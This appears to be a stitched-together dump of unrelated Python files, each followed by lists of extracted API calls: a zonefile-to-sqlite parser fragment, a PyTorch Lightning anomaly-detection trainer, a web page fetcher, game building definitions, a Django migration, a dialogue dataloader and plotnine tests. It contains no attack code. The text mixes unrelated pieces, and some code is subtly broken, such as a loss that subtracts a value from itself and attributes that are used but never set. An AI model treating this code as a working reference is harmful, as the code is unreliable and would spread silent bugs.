self.cursor.executemany('INSERT INTO "{0}" VALUES (?,?,?,?,?,?)'
.format(self.tableName), self.table)
if commit:
self.connection.commit()
self.cursor.close()
else:
return self.connection
if __name__ == "__main__":
from sys import argv
from os import path as path
if len(argv) == 1:
print("""
Bind Zonefile Parser
====================
Version: {0}
Converts zone file to sqlite database
Stand Alone Usage:
./parser.py zonefile [database=zone.sqlite]\n""".format(VERSION))
elif len(argv) == 2:
assert path.isfile(argv[1]), "Zonefile {0} not found".format(argv[1])
parser = Parser(argv[1])
parser.convert2sqlite("zone.sqlite")
print("wrote database to zone.sqlite")
elif len(argv) == 3:
assert path.isfile(argv[1]), "Zonefile {0} not found".format(argv[1])
parser = Parser(argv[1])
parser.convert2sqlite(argv[2])
print("wrote database to {0}".format(argv[2]))
else:
print("To many arguments")
| [
"os.path.isfile",
"sqlite3.connect",
"time.strftime",
"os.path.basename"
] | [((9084, 9108), 'os.path.basename', 'path.basename', (['self.file'], {}), '(self.file)\n', (9097, 9108), True, 'import os.path as path\n'), ((12963, 12981), 'time.strftime', 'strftime', (['"""%Y%m%d"""'], {}), "('%Y%m%d')\n", (12971, 12981), False, 'from time import strftime\n'), ((13868, 13885), 'sqlite3.connect', 'sql.connect', (['file'], {}), '(file)\n', (13879, 13885), True, 'import sqlite3 as sql\n'), ((15096, 15116), 'os.path.isfile', 'path.isfile', (['argv[1]'], {}), '(argv[1])\n', (15107, 15116), True, 'import os.path as path\n'), ((15324, 15344), 'os.path.isfile', 'path.isfile', (['argv[1]'], {}), '(argv[1])\n', (15335, 15344), True, 'import os.path as path\n')] |
import pytorch_lightning as pl
import torch
import typing as th
import torchmetrics
from .. import utils as ebad_utils
class AnoTrainer(pl.LightningModule):
def __init__(
self,
model_cls: th.Union[str, torch.nn.Module],
input_shape: th.Union[th.Tuple[int], th.List[int]],
input_clamp: th.Optional[th.Union[float, tuple]] = (-1., 1.),
model_params: th.Optional[dict] = None,
**kwargs,
):
super().__init__()
self.model = ebad_utils.get_value(self.hparams.model_cls)(**(self.hparams.model_params or dict()))
# metrics
self.val_auroc = torchmetrics.AUROC(num_classes=2, pos_label=1)
self.test_auroc = torchmetrics.AUROC(num_classes=2, pos_label=1)
def forward(self, x):
z = self.model(x)
return z
def training_step(self, batch, batch_idx: th.Optional[int] = None, optimizer_idx: th.Optional[int] = None):
inputs, targets = batch
if self.noise_eps:
# add minimal noise to the original inputs to prevent the model from focusing on purely "clean" inputs
inputs.add_(torch.randn_like(inputs) * self.noise_eps)
if self.hparams.input_clamp:
inputs.clamp_(
*(self.hparams.input_clamp if isinstance(self.hparams.input_clamp, tuple) else (
-self.hparams.input_clamp, self.hparams.input_clamp)))
# Obtain samples
samples = self.sampler.sample(sample_size=inputs.shape[0], update_buffer=True, device=inputs.device)
# Predict energy score for all images
all_inputs = torch.cat([inputs, samples], dim=0)
inputs_out, samples_out = self.model(all_inputs).chunk(2, dim=0)
# Calculate losses
loss = 0.
if self.regularizer_alpha:
reg_loss = (inputs_out ** 2 + samples_out ** 2).mean()
loss += self.regularizer_alpha * reg_loss
self.log(f'loss/regularization/train', reg_loss)
cdiv_loss = samples_out.mean() - samples_out.mean()
self.log(f'loss/contrastive_divergence/train', cdiv_loss)
loss += cdiv_loss
self.log(f'loss/train', loss)
self.log(f'metrics/inputs/train', inputs_out.mean())
self.log(f'metrics/samples/train', samples_out.mean())
return loss
def validation_step(self, batch, batch_idx: th.Optional[int] = None, optimizer_idx: th.Optional[int] = None):
# calculate the contrastive divergence between purely random images and unseen examples
inputs, targets = batch
self.log(f'metrics/random/val', self.model(torch.rand_like(inputs) * 2 - 1).mean())
scores = self.model(inputs)
self.val_auroc(
preds=-scores, # auroc expects predictions to have higher values for the positive class
targets=targets
)
self.log('metrics/auroc/val', self.val_auroc, on_step=True, on_epoch=True)
| [
"torchmetrics.AUROC",
"torch.rand_like",
"torch.cat",
"torch.randn_like"
] | [((646, 692), 'torchmetrics.AUROC', 'torchmetrics.AUROC', ([], {'num_classes': '(2)', 'pos_label': '(1)'}), '(num_classes=2, pos_label=1)\n', (664, 692), False, 'import torchmetrics\n'), ((719, 765), 'torchmetrics.AUROC', 'torchmetrics.AUROC', ([], {'num_classes': '(2)', 'pos_label': '(1)'}), '(num_classes=2, pos_label=1)\n', (737, 765), False, 'import torchmetrics\n'), ((1645, 1680), 'torch.cat', 'torch.cat', (['[inputs, samples]'], {'dim': '(0)'}), '([inputs, samples], dim=0)\n', (1654, 1680), False, 'import torch\n'), ((1147, 1171), 'torch.randn_like', 'torch.randn_like', (['inputs'], {}), '(inputs)\n', (1163, 1171), False, 'import torch\n'), ((2649, 2672), 'torch.rand_like', 'torch.rand_like', (['inputs'], {}), '(inputs)\n', (2664, 2672), False, 'import torch\n')] |
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
"""
Given an URL in string, make a request, fetch its content,
and parse using BeautifulSoup.
"""
import time
import requests
import logging
import urllib.parse as urlparse
from bs4 import BeautifulSoup
class URLContentFetcher(object):
def __init__(self, url, timeout=3, parser='html5lib', proxies=None):
self.url = url
self.soup = None
self.success = None
self.message = None
self.timeout = timeout
self.parser = parser
self.proxies = proxies
self.running_time = 0
def read_and_soup(self):
"""
Fetch content from a url
"""
user_agent_list = [
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) \
AppleWebKit/537.36 (KHTML, like Gecko) \
Chrome/35.0.1916.47 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) \
AppleWebKit/537.36 (KHTML, like Gecko) \
Chrome/60.0.3112.113 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64) \
AppleWebKit/537.36 (KHTML, like Gecko) \
Chrome/60.0.3112.90 Safari/537.36',
'Mozilla/5.0 (X11; Linux x86_64) \
AppleWebKit/537.36 (KHTML, like Gecko) \
Chrome/44.0.2403.157 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.3; Win64; x64) \
AppleWebKit/537.36 (KHTML, like Gecko) \
Chrome/60.0.3112.113 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) \
AppleWebKit/537.36 (KHTML, like Gecko) \
Chrome/57.0.2987.133 Safari/537.36',
]
parsed = urlparse.urlparse(self.url)
headers = {
"User-Agent": user_agent_list[
hash(parsed.netloc + parsed.path) % len(user_agent_list)],
"X-Requested-With": "XMLHttpRequest",
"Accept-Encoding": "gzip",
}
try:
start_time = time.time()
r = requests.get(
self.url,
headers=headers,
timeout=self.timeout,
stream=True,
proxies=self.proxies
)
url_data = r.content.decode('utf-8', 'ignore')
soup = BeautifulSoup(url_data, self.parser)
end_time = time.time()
self.running_time = end_time - start_time
self.soup = soup
self.success = True
except Exception as e:
logging.error(repr(e) + ", url: {0}".format(self.url))
self.success = False
self.message = "Modified URL error: " + str(e)
def get_body(self):
"""
Get the body of a HTML content
"""
if self.soup is None:
self.read_and_soup()
if not self.success or self.soup.body is None:
return ""
return self.soup.body.getText()
def get_title(self):
"""
Get the title from a HTML content
"""
if self.soup is None:
self.read_and_soup()
if not self.success or self.soup.title is None:
return ""
return self.soup.title
| [
"requests.get",
"bs4.BeautifulSoup",
"urllib.parse.urlparse",
"time.time"
] | [((1719, 1746), 'urllib.parse.urlparse', 'urlparse.urlparse', (['self.url'], {}), '(self.url)\n', (1736, 1746), True, 'import urllib.parse as urlparse\n'), ((2022, 2033), 'time.time', 'time.time', ([], {}), '()\n', (2031, 2033), False, 'import time\n'), ((2050, 2150), 'requests.get', 'requests.get', (['self.url'], {'headers': 'headers', 'timeout': 'self.timeout', 'stream': '(True)', 'proxies': 'self.proxies'}), '(self.url, headers=headers, timeout=self.timeout, stream=True,\n proxies=self.proxies)\n', (2062, 2150), False, 'import requests\n'), ((2319, 2355), 'bs4.BeautifulSoup', 'BeautifulSoup', (['url_data', 'self.parser'], {}), '(url_data, self.parser)\n', (2332, 2355), False, 'from bs4 import BeautifulSoup\n'), ((2379, 2390), 'time.time', 'time.time', ([], {}), '()\n', (2388, 2390), False, 'import time\n')] |
from utils.models import base, product
#
# Bronze Age
#
BronzePottery = base.ManufactureBuilding(
name="🏺🏠 Гончарня",
products=[product.dish, product.jug, product.amphora],
create_price=[340, 490],
create_time_sec=1800,
manpower=108
)
BronzePlantation = base.ManufactureBuilding(
name="🍇🏠 Плантация",
products=[product.grape, product.pear, product.melon],
create_price=[340, 490],
create_time_sec=1800,
manpower=108
)
# Iron Age
IronForger = base.ManufactureBuilding(
name="🥩🏠 Мясник",
products=[product.meat, product.chicken],
create_price=[1500, 2400],
create_time_sec=5400,
manpower=230
)
IronButcher = base.ManufactureBuilding(
name="🧵🏠 Портной",
products=[product.threads, product.socks],
create_price=[1500, 2400],
create_time_sec=5400,
manpower=230
)
| [
"utils.models.base.ManufactureBuilding"
] | [((74, 243), 'utils.models.base.ManufactureBuilding', 'base.ManufactureBuilding', ([], {'name': '"""🏺🏠 Гончарня"""', 'products': '[product.dish, product.jug, product.amphora]', 'create_price': '[340, 490]', 'create_time_sec': '(1800)', 'manpower': '(108)'}), "(name='🏺🏠 Гончарня', products=[product.dish,\n product.jug, product.amphora], create_price=[340, 490], create_time_sec\n =1800, manpower=108)\n", (98, 243), False, 'from utils.models import base, product\n'), ((277, 447), 'utils.models.base.ManufactureBuilding', 'base.ManufactureBuilding', ([], {'name': '"""🍇🏠 Плантация"""', 'products': '[product.grape, product.pear, product.melon]', 'create_price': '[340, 490]', 'create_time_sec': '(1800)', 'manpower': '(108)'}), "(name='🍇🏠 Плантация', products=[product.grape,\n product.pear, product.melon], create_price=[340, 490], create_time_sec=\n 1800, manpower=108)\n", (301, 447), False, 'from utils.models import base, product\n'), ((487, 639), 'utils.models.base.ManufactureBuilding', 'base.ManufactureBuilding', ([], {'name': '"""🥩🏠 Мясник"""', 'products': '[product.meat, product.chicken]', 'create_price': '[1500, 2400]', 'create_time_sec': '(5400)', 'manpower': '(230)'}), "(name='🥩🏠 Мясник', products=[product.meat, product.\n chicken], create_price=[1500, 2400], create_time_sec=5400, manpower=230)\n", (511, 639), False, 'from utils.models import base, product\n'), ((673, 830), 'utils.models.base.ManufactureBuilding', 'base.ManufactureBuilding', ([], {'name': '"""🧵🏠 Портной"""', 'products': '[product.threads, product.socks]', 'create_price': '[1500, 2400]', 'create_time_sec': '(5400)', 'manpower': '(230)'}), "(name='🧵🏠 Портной', products=[product.threads,\n product.socks], create_price=[1500, 2400], create_time_sec=5400,\n manpower=230)\n", (697, 830), False, 'from utils.models import base, product\n')] |
# Generated by Django 2.1.3 on 2018-11-09 00:49
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('workertasks', '0002_auto_20181109_0046'),
]
operations = [
migrations.AlterField(
model_name='assignment',
name='begin_exp',
field=models.DateTimeField(null=True),
),
migrations.AlterField(
model_name='assignment',
name='begin_hit',
field=models.DateTimeField(null=True),
),
migrations.AlterField(
model_name='assignment',
name='end_hit',
field=models.DateTimeField(null=True),
),
migrations.AlterField(
model_name='worker',
name='qualification',
field=models.IntegerField(default=0),
),
]
| [
"django.db.models.DateTimeField",
"django.db.models.IntegerField"
] | [((347, 378), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'null': '(True)'}), '(null=True)\n', (367, 378), False, 'from django.db import migrations, models\n'), ((507, 538), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'null': '(True)'}), '(null=True)\n', (527, 538), False, 'from django.db import migrations, models\n'), ((665, 696), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'null': '(True)'}), '(null=True)\n', (685, 696), False, 'from django.db import migrations, models\n'), ((825, 855), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'default': '(0)'}), '(default=0)\n', (844, 855), False, 'from django.db import migrations, models\n')] |
import cotk
from cotk._utils.file_utils import get_resource_file_path
from cotk.dataloader.dataloader import *
from collections import Counter
import numpy as np
from itertools import chain
class Score(DataField):
def get_next(self, dataset):
r"""read text and returns the next label(integer). Note that it may raise StopIteration.
Args:{DataField.GET_NEXT_ARG}
Examples:
>>> dataset = iter(["1\n", "0\n"])
>>> field = Label()
>>> field.get_next(dataset)
1
>>> field.get_next(dataset)
0
"""
score = next(dataset)
return float(score.strip())
def _map_fun(self, element, convert_ids_to_tokens=None):
"""
Returns the element itself.
Args:
element: An element of a dataset.
convert_ids_to_tokens: It's useless. This argument exists, just to keep the signature the same as that of super class.
"""
return element
class TranslationWithScore(cotk.dataloader.SingleTurnDialog):
@cotk._utils.hooks.hook_dataloader
def __init__(self, file_id, min_vocab_times, \
max_sent_length, invalid_vocab_times, \
tokenizer, remains_capital
):
super().__init__(file_id, min_vocab_times, \
max_sent_length, invalid_vocab_times, \
tokenizer, remains_capital)
def _load_data(self):
data_fields = {
'train': [['post', 'Sentence'], ['resp', 'Sentence'], ['score', Score]],
'dev': [['post', 'Sentence'], ['resp', 'Sentence']],
'test': [['post', 'Sentence'], ['resp', 'Sentence']],
}
return self._general_load_data(self._file_path, data_fields, \
self._min_vocab_times, self._max_sent_length, None, self._invalid_vocab_times)
def _general_load_data(self, file_path, data_fields, min_vocab_times, max_sent_length, max_turn_length,
invalid_vocab_times):
r'''This function implements a general loading process.
Arguments:
file_path (str): A string indicating the path of dataset.
data_fields (dict, list, tuple): If it's a list(tuple), it must be a list of (key, field) pairs.
Field must be a DataField instance,
or a subclass of DataField(in this case, its instance will be used, assuming its constructor accepts no arguments),
or a string(in this case, the instance of the class, whose __name__ is field, will be used).
For example, data_fields=[['post', 'Sentence'], ['label', Label]] means that,
in the raw file, the first line is a sentence and the second line is a label. They are saved in a dict.
dataset = {'post': [line1, line3, line5, ...], 'label': [line2, line4, line6, ...]}
data_fields=[['key1', 'Session'], ['key2', Label()]], means that, in the raw file, the first *several lines*
is a session, *followed by an empty line*, and the next line is a label.
dataset = {'key1': [session1, session2, ...], 'key2': [label1, label2, ...]}
If it's a dict, different datasets may have different formats.(If `data_fields` is a list or a tuple, different datasets have the same format).
Its keys are the same as `self.key_name` that indicate the datasets, and the values are lists as mentioned above.
For example, data_fields = {'train': [['sess', 'Session'], ['label', 'Label']], 'test': [['sess', 'session']]},
means that the train set contains sessions and labels, but the test set only contains sessions.
min_vocab_times (int): A cut-off threshold of valid tokens. All tokens appear
not less than `min_vocab_times` in **training set** will be marked as valid words.
max_sent_length (int): All sentences longer than ``max_sent_length`` will be shortened
to first ``max_sent_length`` tokens.
max_turn_length (int): All sessions, whose turn length is longer than ``max_turn_length`` will be shorten to
first ``max_turn_length`` sentences. If the dataset don't contains sessions, this parameter will be ignored.
invalid_vocab_times (int): A cut-off threshold of invalid tokens. All tokens appear
not less than ``invalid_vocab_times`` in the **whole dataset** (except valid words) will be
marked as invalid words. Otherwise, they are unknown words, which are ignored both for
model or metrics.
Returns:
(tuple): containing:
* **all_vocab_list** (list): vocabulary list of the datasets,
including valid and invalid vocabs.
* **valid_vocab_len** (int): the number of valid vocab.
``vocab_list[:valid_vocab_len]`` will be regarded as valid vocabs,
while ``vocab_list[valid_vocab_len:]`` regarded as invalid vocabs.
* **data** (dict): a dict contains data.
* **data_size** (dict): a dict contains size of each item in data.
'''
def get_fields(fields):
assert isinstance(fields, list) or isinstance(fields, tuple)
return [(data_key, DataField.get_field(field)) for data_key, field in fields]
if isinstance(data_fields, dict):
no_field_keys = [key for key in self.key_name if key not in data_fields]
if no_field_keys:
raise ValueError('There is no data fields for dataset(%s) ' % ', '.join(no_field_keys))
try:
data_fields = {key: get_fields(data_fields[key]) for key in self.key_name}
except AssertionError:
raise TypeError('If `data_field` is a dict, its value must be a list(or tuple) of lists(or tuples).')
elif isinstance(data_fields, list) or isinstance(data_fields, tuple):
data_fields = get_fields(data_fields)
data_fields = {key: data_fields for key in self.key_name}
else:
raise TypeError('`data_fields` must be a dict, or a list, or a tuple.')
# now data_fields is a dict. Keys are the same as self.key_name('train', 'test', 'dev', etc.). Each value is
# a list(tuple) of lists(tuples), which means (data_key(str), data_field(DataField)) pairs.
# For example,
# data_fields == {'train': [['sent', Sentence()], ['label', Label()]],
# 'test': [['sent', Sentence()], ['label', Label()]]}.
# Note, different dataset may have different fields.
special_tokens = set(self.ext_vocab)
origin_data = {}
for key in self.key_name:
origin_data[key] = {data_key: [] for data_key, _ in data_fields[key]}
with open("%s/%s.txt" % (file_path, key), encoding='utf-8') as f_file:
while True:
try:
for data_key, field in data_fields[key]:
element = field.convert_to_tokens(field.get_next(f_file), self.tokenize)
for token in field.iter_tokens(element):
if token in special_tokens:
raise RuntimeError(
'The dataset contains special token "%s". This is not allowed.' % token)
origin_data[key][data_key].append(element)
except StopIteration:
break
def chain_allvocab(dic, fields):
vocabs = []
for data_key, field in fields:
for element in dic[data_key]:
vocabs.extend(field.iter_tokens(element))
return vocabs
raw_vocab_list = chain_allvocab(origin_data['train'], data_fields['train'])
# Important: Sort the words preventing the index changes between
# different runs
vocab = sorted(Counter(raw_vocab_list).most_common(), \
key=lambda pair: (-pair[1], pair[0]))
left_vocab = [x[0] for x in vocab if x[1] >= min_vocab_times]
vocab_list = self.ext_vocab + list(left_vocab)
valid_vocab_len = len(vocab_list)
valid_vocab_set = set(vocab_list)
for key in self.key_name:
if key == 'train':
continue
raw_vocab_list.extend(chain_allvocab(origin_data[key], data_fields[key]))
vocab = sorted(Counter(raw_vocab_list).most_common(), \
key=lambda pair: (-pair[1], pair[0]))
left_vocab = [x[0] for x in vocab if x[1] >= invalid_vocab_times and x[0] not in valid_vocab_set]
vocab_list.extend(left_vocab)
print("valid vocab list length = %d" % valid_vocab_len)
print("vocab list length = %d" % len(vocab_list))
word2id = {w: i for i, w in enumerate(vocab_list)}
data = {}
data_size = {}
for key in self.key_name:
data[key] = {}
for data_key, field in data_fields[key]:
origin_data[key][data_key] = [field.convert_to_ids(element, word2id, self) for element in
origin_data[key][data_key]]
data[key][data_key] = [
field.cut(element, max_sent_length=max_sent_length, max_turn_length=max_turn_length) for element in
origin_data[key][data_key]]
if key not in data_size:
data_size[key] = len(data[key][data_key])
elif data_size[key] != len(data[key][data_key]):
raise RuntimeError(
"The data of input %s.txt contains different numbers of fields" % key)
vocab = chain_allvocab(origin_data[key], data_fields[key])
vocab_num = len(vocab)
oov_num = sum([word not in word2id for word in vocab])
invalid_num = sum([word not in valid_vocab_set for word in vocab]) - oov_num
sent_length = []
for data_key, field in data_fields[key]:
sent_length.extend(
[len(sent) for element in origin_data[key][data_key] for sent in field.iter_sentence(element)])
cut_word_num = np.sum(np.maximum(np.array(sent_length) - max_sent_length, 0))
session_keys = [data_key for data_key, field in data_fields[key] if field.__class__ == Session]
if session_keys:
turn_length = list(
map(len, chain.from_iterable((origin_data[key][sess_key] for sess_key in session_keys))))
max_turn_length_before_cut = max(turn_length)
sent_num = sum(turn_length)
cut_sentence_rate = np.sum(np.maximum(np.array(turn_length) - max_turn_length, 0)) / sent_num
else:
max_turn_length_before_cut = 1
cut_sentence_rate = 0
print(("%s set. invalid rate: %f, unknown rate: %f, max sentence length before cut: %d, " + \
"cut word rate: %f\n\tmax turn length before cut: %d, cut sentence rate: %f") % \
(key, invalid_num / vocab_num, oov_num / vocab_num, max(sent_length), \
cut_word_num / vocab_num, max_turn_length_before_cut, cut_sentence_rate))
# calculate hash value
hash_value = DataloaderHash(ignore_tokens=(self.go_id, self.eos_id, self.pad_id),
unk_id=self.unk_id).hash_datasets(data, data_fields, vocab_list[len(
self.ext_vocab):valid_vocab_len])
self.__hash_value = hash_value
return vocab_list, valid_vocab_len, data, data_size
def get_batch(self, key, indexes):
'''{LanguageProcessingBase.GET_BATCH_DOC_WITHOUT_RETURNS}
Returns:
(dict): A dict at least contains:
* **post_length** (:class:`numpy.ndarray`): A 1-d array, the length of post in each batch.
Size: ``[batch_size]``
* **post** (:class:`numpy.ndarray`): A 2-d padded array containing words of id form in posts.
Only provide valid words. ``unk_id`` will be used if a word is not valid.
Size: ``[batch_size, max(sent_length)]``
* **post_allvocabs** (:class:`numpy.ndarray`): A 2-d padded array containing words of id
form in posts. Provide both valid and invalid vocabs.
Size: ``[batch_size, max(sent_length)]``
* **resp_length** (:class:`numpy.ndarray`): A 1-d array, the length of response in each batch.
Size: ``[batch_size]``
* **resp** (:class:`numpy.ndarray`): A 2-d padded array containing words of id form
in responses. Only provide valid vocabs. ``unk_id`` will be used if a word is not valid.
Size: ``[batch_size, max(sent_length)]``
* **resp_allvocabs** (:class:`numpy.ndarray`):
A 2-d padded array containing words of id form in responses.
Provide both valid and invalid vocabs.
Size: ``[batch_size, max(sent_length)]``
Examples:
>>> # all_vocab_list = ["<pad>", "<unk>", "<go>", "<eos>", "how", "are", "you",
>>> # "hello", "i", "am", "fine"]
>>> # vocab_size = 9
>>> # vocab_list = ["<pad>", "<unk>", "<go>", "<eos>", "how", "are", "you", "hello", "i"]
>>> dataloader.get_batch('train', [0, 1])
{
"post_allvocabs": numpy.array([
[2, 5, 6, 10, 3], # first post: <go> are you fine <eos>
[2, 7, 3, 0, 0], # second post: <go> hello <eos> <pad> <pad>
]),
"post": numpy.array([
[2, 5, 6, 1, 3], # first post: <go> are you <unk> <eos>
[2, 7, 3, 0, 0], # second post: <go> hello <eos> <pad> <pad>
]),
"resp_allvocabs": numpy.array([
[2, 8, 9, 10, 3], # first response: <go> i am fine <eos>
[2, 7, 3, 0, 0], # second response: <go> hello <eos> <pad> <pad>
]),
"resp": numpy.array([
[2, 8, 1, 1, 3], # first response: <go> i <unk> <unk> <eos>
[2, 7, 3, 0, 0], # second response: <go> hello <eos> <pad> <pad>
]),
"post_length": numpy.array([5, 3]), # length of posts
"resp_length": numpy.array([5, 3]), # length of responses
}
'''
if key not in self.key_name:
raise ValueError("No set named %s." % key)
res = {}
batch_size = len(indexes)
res["post_length"] = np.array(list(map(lambda i: len(self.data[key]['post'][i]), indexes)), dtype=int)
res["resp_length"] = np.array(list(map(lambda i: len(self.data[key]['resp'][i]), indexes)), dtype=int)
res_post = res["post"] = np.zeros((batch_size, np.max(res["post_length"])), dtype=int)
res_resp = res["resp"] = np.zeros((batch_size, np.max(res["resp_length"])), dtype=int)
for i, j in enumerate(indexes):
post = self.data[key]['post'][j]
resp = self.data[key]['resp'][j]
res_post[i, :len(post)] = post
res_resp[i, :len(resp)] = resp
res["post_allvocabs"] = res_post.copy()
res["resp_allvocabs"] = res_resp.copy()
res_post[res_post >= self.valid_vocab_len] = self.unk_id
res_resp[res_resp >= self.valid_vocab_len] = self.unk_id
if key=='train':
res['score']=np.array([self.data[key]['score'][i] for i in indexes])
return res
def main():
max_sent_length = 50
loader = TranslationWithScore('./data/iwslt14_raml', 10, max_sent_length, 0, 'nltk', False)
loader.restart("train",batch_size=2,shuffle=True)
q=loader.get_next_batch("train")
print(len(q['score']))
print(q)
if __name__ == '__main__':
main()
| [
"itertools.chain.from_iterable",
"collections.Counter",
"numpy.max",
"numpy.array"
] | [((15676, 15731), 'numpy.array', 'np.array', (["[self.data[key]['score'][i] for i in indexes]"], {}), "([self.data[key]['score'][i] for i in indexes])\n", (15684, 15731), True, 'import numpy as np\n'), ((15048, 15074), 'numpy.max', 'np.max', (["res['post_length']"], {}), "(res['post_length'])\n", (15054, 15074), True, 'import numpy as np\n'), ((15143, 15169), 'numpy.max', 'np.max', (["res['resp_length']"], {}), "(res['resp_length'])\n", (15149, 15169), True, 'import numpy as np\n'), ((8020, 8043), 'collections.Counter', 'Counter', (['raw_vocab_list'], {}), '(raw_vocab_list)\n', (8027, 8043), False, 'from collections import Counter\n'), ((8532, 8555), 'collections.Counter', 'Counter', (['raw_vocab_list'], {}), '(raw_vocab_list)\n', (8539, 8555), False, 'from collections import Counter\n'), ((10352, 10373), 'numpy.array', 'np.array', (['sent_length'], {}), '(sent_length)\n', (10360, 10373), True, 'import numpy as np\n'), ((10600, 10676), 'itertools.chain.from_iterable', 'chain.from_iterable', (['(origin_data[key][sess_key] for sess_key in session_keys)'], {}), '(origin_data[key][sess_key] for sess_key in session_keys)\n', (10619, 10676), False, 'from itertools import chain\n'), ((10841, 10862), 'numpy.array', 'np.array', (['turn_length'], {}), '(turn_length)\n', (10849, 10862), True, 'import numpy as np\n')] |
import string
import numpy as np
import pandas as pd
import pytest
from plotnine import (ggplot, aes, geom_point, geom_jitter, geom_bar,
geom_col, geom_boxplot, geom_text, geom_rect,
after_stat, position_dodge, position_dodge2,
position_jitter, position_jitterdodge,
position_nudge, position_stack, theme)
from plotnine.positions.position import position
from plotnine.exceptions import PlotnineError
n = 6
m = 10
random_state = np.random.RandomState(1234567890)
df1 = pd.DataFrame({'x': [1, 2, 1, 2],
'y': [1, 1, 2, 2]})
df2 = pd.DataFrame({'x': np.repeat(range(n+1), range(n+1)),
'z': np.repeat(range(n//2), range(3, n*2, 4))})
df3 = pd.DataFrame({
'x': random_state.choice(['A', 'B'], n*m),
'y': random_state.randint(0, 20, n*m),
'c': random_state.choice([False, False, True, False], n*m)
})
random_state.seed(1234567890)
_theme = theme(subplots_adjust={'right': 0.85})
def test_jitter():
df1 = pd.DataFrame({'x': [1, 2, 1, 2],
'y': [1, 1, 2, 2]})
p = (ggplot(df1, aes('x', 'y')) +
geom_point(size=10) +
geom_jitter(size=10, color='red', random_state=random_state) +
geom_jitter(size=10, color='blue', width=0.1,
height=0.1, random_state=random_state))
assert p + _theme == 'jitter'
with pytest.raises(PlotnineError):
geom_jitter(position=position_jitter(), width=0.1)
def test_nudge():
p = (ggplot(df1, aes('x', 'y')) +
geom_point(size=10) +
geom_point(size=10, color='red',
position=position_nudge(.25, .25)))
assert p + _theme == 'nudge'
def test_stack():
p = (ggplot(df2, aes('factor(z)')) +
geom_bar(aes(fill='factor(x)'), position='stack'))
assert p + _theme == 'stack'
def test_stack_negative():
df = df1.copy()
_loc = df.columns.get_loc
df.iloc[0, _loc('y')] *= -1
df.iloc[len(df)-1, _loc('y')] *= -1
p = (ggplot(df)
+ geom_col(aes('factor(x)', 'y', fill='factor(y)'),
position='stack')
+ geom_text(aes('factor(x)', 'y', label='y'),
position=position_stack(vjust=0.5))
)
assert p + _theme == 'stack-negative'
def test_fill():
p = (ggplot(df2, aes('factor(z)')) +
geom_bar(aes(fill='factor(x)'), position='fill'))
assert p + _theme == 'fill'
def test_dodge():
p = (ggplot(df2, aes('factor(z)')) +
geom_bar(aes(fill='factor(x)'), position='dodge'))
assert p + _theme == 'dodge'
def test_dodge_preserve_single():
df1 = pd.DataFrame({'x': ['a', 'b', 'b'],
'y': ['a', 'a', 'b']})
p = (ggplot(df1, aes('x', fill='y')) +
geom_bar(position=position_dodge(preserve='single')))
assert p + _theme == 'dodge_preserve_single'
def test_dodge_preserve_single_text():
df1 = pd.DataFrame({'x': ['a', 'b', 'b', 'b'],
'y': ['a', 'a', 'b', 'b']})
d = position_dodge(preserve='single', width=0.9)
p = (ggplot(df1, aes('x', fill='y'))
+ geom_bar(position=d)
+ geom_text(
aes(y=after_stat('count'), label=after_stat('count')),
stat='count',
position=d,
va='bottom')
)
assert p + _theme == 'dodge_preserve_single_text'
def test_dodge2():
p = (ggplot(df3, aes('x', 'y', color='c')) +
geom_boxplot(position='dodge2', size=2))
assert p + _theme == 'dodge2'
def test_dodge2_varwidth():
p = (ggplot(df3, aes('x', 'y', color='c')) +
geom_boxplot(
position=position_dodge2(preserve='single'),
varwidth=True,
size=2)
)
assert p + _theme == 'dodge2_varwidth'
def test_jitterdodge():
df = pd.DataFrame({
'x': np.ones(n*2),
'y': np.repeat(np.arange(n), 2),
'letters': np.repeat(list(string.ascii_lowercase[:n]), 2)})
position = position_jitterdodge(random_state=random_state)
p = (ggplot(df, aes('x', 'y', fill='letters')) +
geom_point(size=10, fill='black') +
geom_point(size=10, position=position))
assert p + _theme == 'jitterdodge'
def test_position_from_geom():
geom = geom_point(position='jitter')
assert isinstance(position.from_geom(geom), position_jitter)
geom = geom_point(position='position_jitter')
assert isinstance(position.from_geom(geom), position_jitter)
geom = geom_point(position=position_jitter())
assert isinstance(position.from_geom(geom), position_jitter)
geom = geom_point(position=position_jitter)
assert isinstance(position.from_geom(geom), position_jitter)
def test_dodge_empty_data():
empty_df = pd.DataFrame({'x': [], 'y': []})
p = (ggplot(df1, aes('x', 'y'))
+ geom_point()
+ geom_rect(
empty_df,
aes(xmin='x', xmax='x+1', ymin='y', ymax='y+1'),
position='dodge')
)
p.draw_test()
| [
"plotnine.geom_boxplot",
"plotnine.position_dodge2",
"numpy.ones",
"numpy.arange",
"plotnine.position_dodge",
"plotnine.aes",
"plotnine.position_stack",
"pandas.DataFrame",
"plotnine.position_jitter",
"plotnine.after_stat",
"numpy.random.RandomState",
"plotnine.position_nudge",
"pytest.raises",
"plotnine.ggplot",
"plotnine.position_jitterdodge",
"plotnine.theme",
"plotnine.positions.position.position.from_geom",
"plotnine.geom_bar",
"plotnine.geom_point",
"plotnine.geom_jitter"
